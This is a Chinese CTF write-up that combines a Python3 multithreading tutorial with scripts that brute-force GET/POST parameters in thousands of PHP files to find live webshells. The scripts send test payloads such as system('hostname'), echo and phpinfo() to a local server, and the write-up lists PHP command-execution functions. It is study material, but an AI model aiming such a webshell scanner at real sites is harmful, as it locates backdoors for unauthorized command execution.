python3多线程实例之批量检测webshell存活工具

楔子

前两天的强网杯,有个题目叫高明的黑客,核心任务就是从3000多个php文件中找到存活的webshell,大概每个php文件有几十个post,get的点,头天晚上跑了一晚上,自己太菜了,很多东西忘了考虑,结束后拿多线程跑了一下很快就出来了,所以记录一下教训吧,碰到需要大量人力,时间的脚本,应该先尽量优化,而不是跑了半天发现很慢再来改快一点,以此循环,黄花菜都凉了,果然犹豫就会败北

一、python3多线程

1.1、Python3 线程中常用的两个模块为:

  • _thread
  • threading

1.2、thread 模块已被废弃。用户可以使用 threading 模块代替。所以,在 Python3 中不能再使用”thread” 模块。为了兼容性,Python3 将 thread 重命名为 “_thread”。使用起来也很简单

1
_thread.start_new_thread ( function, args[, kwargs] )

一个实例

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
import _thread
import time

# 为线程定义一个函数
def print_time( threadName, delay):
count = 0
while count < 5:
time.sleep(delay)
count += 1
print ("%s: %s" % ( threadName, time.ctime(time.time()) ))

# 创建两个线程
try:
_thread.start_new_thread( print_time, ("Thread-1", 2, ) )
_thread.start_new_thread( print_time, ("Thread-2", 4, ) )
except:
print ("Error: 无法启动线程")

while 1:
pass

1.3、_thread 提供了低级别的、原始的线程以及一个简单的锁,它相比于 threading 模块的功能还是比较有限的。

Thread类提供了以下方法:
  • threading.currentThread(): 返回当前的线程变量。
  • threading.enumerate(): 返回一个包含正在运行的线程的list
  • threading.activeCount(): 返回正在运行的线程数量,与len(threading.enumerate())有相同的结果。
除了使用方法外,线程模块同样提供了Thread类来处理线程,Thread类提供了以下方法:
  • run(): 用以表示线程活动的方法。
  • start():启动线程活动。
  • join([time]): 等待至线程中止。这阻塞调用线程直至线程的join() 方法被调用中止-正常退出或者抛出未处理的异常-或者是可选的超时发生。
  • isAlive(): 返回线程是否活动的。
  • getName(): 返回线程名。
  • setName(): 设置线程名。

1.4、最普通的使用多线程的方法

1
2
3
4
5
6
7
8
9
10
11
12
13
14
import threading

def thread_job():
print('This is Thread_job,number is %s'% threading.current_thread())

def main():
added_thread=threading.Thread(target=thread_job)
added_thread.start()
print(threading.active_count())
print(threading.enumerate())
print(threading.current_thread())

if __name__=='__main__':
main()

1.5、使用join,和queue

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import threading
import time
from queue import Queue
def job(l,q):
for i in range(len(l)):
l[i]=l[i]**2
q.put(l)
def multithreading():
q=Queue()
threads=[]
data=[[1,2,3],[3,4,5],[4,4,4],[5,5,5]]
for i in range(4):
t=threading.Thread(target=job,args=(data[i],q))
t.start()
threads.append(t)
for thread in threads:
thread.join()
results=[]
for _ in range(4):
results.append(q.get())
print(results)

if __name__=='__main__':
multithreading()

返回结果

1
[[1, 4, 9], [9, 16, 25], [16, 16, 16], [25, 25, 25]]

1.6、如果要使用线程同步

如果多个线程共同对某个数据修改,则可能出现不可预料的结果,为了保证数据的正确性,需要对多个线程进行同步。

使用 Thread 对象的 Lock 和 Rlock 可以实现简单的线程同步,这两个对象都有 acquire 方法和 release 方法,对于那些需要每次只允许一个线程操作的数据,可以将其操作放到 acquire 和 release 方法之间。如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
import threading
import time

class myThread (threading.Thread):
def __init__(self, threadID, name, counter):
threading.Thread.__init__(self)
self.threadID = threadID
self.name = name
self.counter = counter
def run(self):
print ("开启线程: " + self.name)
# 获取锁,用于线程同步
threadLock.acquire()
print_time(self.name, self.counter, 3)
# 释放锁,开启下一个线程
threadLock.release()

def print_time(threadName, delay, counter):
while counter:
time.sleep(delay)
print ("%s: %s" % (threadName, time.ctime(time.time())))
counter -= 1

threadLock = threading.Lock()
threads = []

# 创建新线程
thread1 = myThread(1, "Thread-1", 1)
thread2 = myThread(2, "Thread-2", 2)

# 开启新线程
thread1.start()
thread2.start()

# 添加线程到线程列表
threads.append(thread1)
threads.append(thread2)

# 等待所有线程完成
for t in threads:
t.join()
print ("退出主线程")

二、php webshell相关知识

WebShell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。
执行命令常用的函数有:

1
2
3
system('命令'
eval('php code')
assert('php code')

其他一些骚函数导致的php webshell
str_replace字符替换函数:

1
2
3
4
<?php
$s = str_replace('p','','pspypsptpepmp');
echo $s;
#system

create_fuction()创建匿名函数:

1
2
3
4
<?php
#create_function('参数列表', 'php代码字符串');
$info = create_function('','phpinfo();');
$info();?>

总结:

  • 系统命令执行: system, passthru, shell_exec, exec, popen, proc_open
  • 代码执行: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13
  • 文件包含: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite

三、暴力检验webshell存活

回到本题,最开始不知道有这么多post,get点,所以拿D盾等工具,23333,所有文件全部被找到了,我估计这些工具就是单纯匹配这几个敏感函数和post,get点,为了确认是否存活我们需要在本地搭建这个服务,并且找到通用的回显来确定,因为我在windows上环境搭建的php code可以用phpinfo()或者system('hostname');前者更大所以倾向于后者,命令用hostname能拿到主机名称,反过来是不行的,(如果你用Linux服务器使用system(‘id’)能检验phpcode,id检验命令,


所以初期代码为(暂时只考虑了get请求的参数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
import os
import re
import requests
answer = open('answer.txt','w')
filePath = './src/'
files = os.listdir(filePath)
url = "http://localhost/src/"
file_count = 0
def get_rep(filename, name):
r_url = url + filename + "?" + name + "=hostname"
rep = requests.get(r_url)
if 'DESKTOP-CE0L9E5' in rep.content.decode('utf-8'):
answer.write("Got It! !!!!!!! " + filename + " The param is: _GET[\'" + name +"\']\n")
print("Got It! !!!!!!! " + filename + " The param is: _GET[\'" + name +"\']")

r_url = url + filename + "?" + name + "=system('hostname');"
rep = requests.get(r_url)
if 'DESKTOP-CE0L9E5' in rep.content.decode('utf-8'):
answer.write("Got It! !!!!!!! " + filename + " The param is: _GET[\'" + name +"\']\n")
print("Got It! !!!!!!! " + filename + " The param is: _GET[\'" + name +"\']")

for k in files:
if k == '.DS_Store':
continue
if k == 'index.html':
continue
print(k)
with open(filePath + k, 'rt') as f:
file_count+=1
print('已经完成: {:.2%}'.format(file_count/len(files)))
content = f.read()
get = re.findall(r"GET\['(.+?)'\]", content)
#post = re.findall(r"POST\['(.+?)'\]", content)
for i in get:
print('FileName:'+k+' ParamName:'+i)
get_rep(k, i)
f.close()
answer.close()

想了想有没有优化的地方,如果能找到一个phpcode和命令都能测试的一个通用函数就可以减少一半的网络请求,只要你找肯定是有的那就是echo 'Hello Kitty';我们会发现无论是phpcode还是system执行了就会有Hello Kitty的回显

所以get请求就可以修改为

1
2
3
4
5
6
def get_rep(filename, name):
r_url = url + filename + "?" + name + "=echo 'Hello Kitty';"
#print(r_url)
rep = requests.get(r_url)
if 'Hello Kitty' in rep.content.decode('gbk'):
Record_To_File(filename,name)

四、多线程检验webshell存活

现在只需要把上面的暴力脚本和多线程脚本结合一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
import threading
import time
import os
import re
import requests
from queue import Queue
file_count = 0
url = "http://127.0.0.1/src/"
filePath = './src/'
files = os.listdir(filePath)
nameList=[] #存储名字名称列表
nameSepList=[] #存储分分离后的文件名称列表
#把文件名存储起来 过滤拿到我们想要的文件后缀
threadLock = threading.Lock()
global start
def storefile():
for k in files:
if k == '.DS_Store':
continue
if k == 'index.html':
continue
nameList.append(k)
#print(k)

#分离文件名 给每个线程分一个
def separateName(threadCount):
for i in range(0,len(files),threadCount):
nameSepList.append(nameList[i:i+threadCount])


#多线程函数
def multithreading(threadCount):
separateName(threadCount)#先分离
for i in range(threadCount):
t=threading.Thread(target=run_one_thread,args=(nameSepList[i],))
t.start()

#每个线程的运作 参数为文件名称的列表
def run_one_thread(name_list):
for k in name_list:
print(k)
with open(filePath + k, 'rt') as f:
#threadLock.acquire()
global file_count
file_count+=1
#threadLock.release()
#print('已经完成: {:.2%}'.format(file_count/len(files)))
content = f.read()
get = re.findall(r"GET\['(.+?)'\]", content)
#post = re.findall(r"POST\['(.+?)'\]", content)
for i in get:
#print('已经完成: {:.2%}'.format(file_count/len(files))+' FileName:'+k+' ParamName:'+i)
get_rep(k, i)
f.close()
#做GET请求
def get_rep(filename, name):
r_url = url + filename + "?" + name + "=echo 'Hello Kitty';"
#print(r_url)
rep = requests.get(r_url)
if 'Hello Kitty' in rep.content.decode('gbk'):
Record_To_File(filename,name)


def Record_To_File(filename,name):
answer = open('answer.txt','a+')
end = time.time()
answer.write("Got It! !!!!!!! " + filename + " The param is: _GET[\'" + name +"\']"+" Need time :"+str(end-start)+"s\n")
print("Got It! !!!!!!! " + filename + " The param is: _GET[\'" + name +"\']")
answer.close()


if __name__=='__main__':
start = time.time()
storefile()
multithreading(20)

优化了一波,减少了多线程,但是递归文件查找,还有assert的改进

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
import threading
import time
import os
import re
import requests
from queue import Queue
file_count = 0
url = "http://127.0.0.1"

url_list=[] #存储名字名称列表
nameSepList=[] #存储分分离后的文件名称列表
#把文件名存储起来 过滤拿到我们想要的文件后缀
threadLock = threading.Lock()
base_dir='E:/CodingSoftware/PhpStudy/PHPTutorial/WWW'
print("base_url: "+url)
print("base_dir: "+base_dir)

def get_url_list():
base_url=url
work_dir = base_dir
length=len(work_dir)
for parent, dirnames, filenames in os.walk(work_dir, followlinks=True):
for filename in filenames:
file_path = os.path.join(parent, filename)
#print('文件名:%s' % filename)
file_path1=file_path[length:]
file_path2=file_path1.replace('\\','/')
if file_path2.endswith('.php') and ('phpMyAdmin' not in file_path2):
url_list.append(base_url+file_path2)
#print(base_url+file_path2)
#每个线程的运作 参数为文件名称的列表
def run(name_list):
for k in name_list:
#print(k)
obj_path=k[len(url):]
file_path=base_dir+obj_path
try:
with open(file_path, 'rt', errors='ignore') as f:
content = f.read()
get = re.findall(r"GET\['([A-Za-z_-]+?)'\]", content)
get1 = re.findall(r"GET\[\"([A-Za-z_-]+?)\"\]", content)
get2 = re.findall(r"GET\[([A-Za-z_-]+?)\]", content)
post = re.findall(r"POST\['([A-Za-z_-]+?)'\]", content)
post1 = re.findall(r"POST\[\"([A-Za-z_-]+?)\"\]", content)
post2 = re.findall(r"POST\[([A-Za-z_-]+?)\]", content)
for i in get:
get_rep(k,i)
print(obj_path+" Key is: "+i)
for i in get1:
get_rep(k,i)
print(obj_path+" Key is: "+i)
for i in get2:
get_rep(k,i)
print(obj_path+" Key is: "+i)
for i in post:
post_rep(k,i)
print(obj_path+" Key is: "+i)
for i in post1:
post_rep(k,i)
print(obj_path+" Key is: "+i)
for i in post2:
post_rep(k,i)
print(obj_path+" Key is: "+i)
f.close()
except Exception as e:
raise e
#做GET请求
def get_rep(base_url, name):
r_url = base_url + "?" + name + "=echo 'Hello Kitty';"
#print(r_url)
rep = requests.get(r_url)
if 'Hello Kitty' in rep.content.decode('gbk'):
Record_To_File(r_url,name)

r_url = base_url + "?" + name + "=phpinfo();" #预防assert函数
#print(r_url)
rep = requests.get(r_url)
if 'PHP Version' in rep.content.decode('gbk'):
Record_To_File(r_url,name)

def post_rep(base_url, name):

r_url = base_url
param = {
name: "echo 'HelloKitty';"
}
rep = requests.post(r_url, data=param)
#print(r_url + " POST: " + name)
if 'HelloKitty' in rep.content.decode('gbk'):
Record_To_File(r_url,name)

param = {
name: "phpinfo();"
}
rep = requests.post(r_url, data=param)
#print(r_url + " POST: " + name)
if 'PHP Version' in rep.content.decode('gbk'):
Record_To_File(r_url,name)


def Record_To_File(filename,name):
answer = open('answer.txt','a+')
end = time.time()
answer.write("Got It! !!!!!!! " + filename + " The param is: [\'" + name +"\']\n")
print("Got It! !!!!!!! " + filename + " The param is: [\'" + name +"\']")
answer.close()


if __name__=='__main__':
get_url_list()
run(url_list)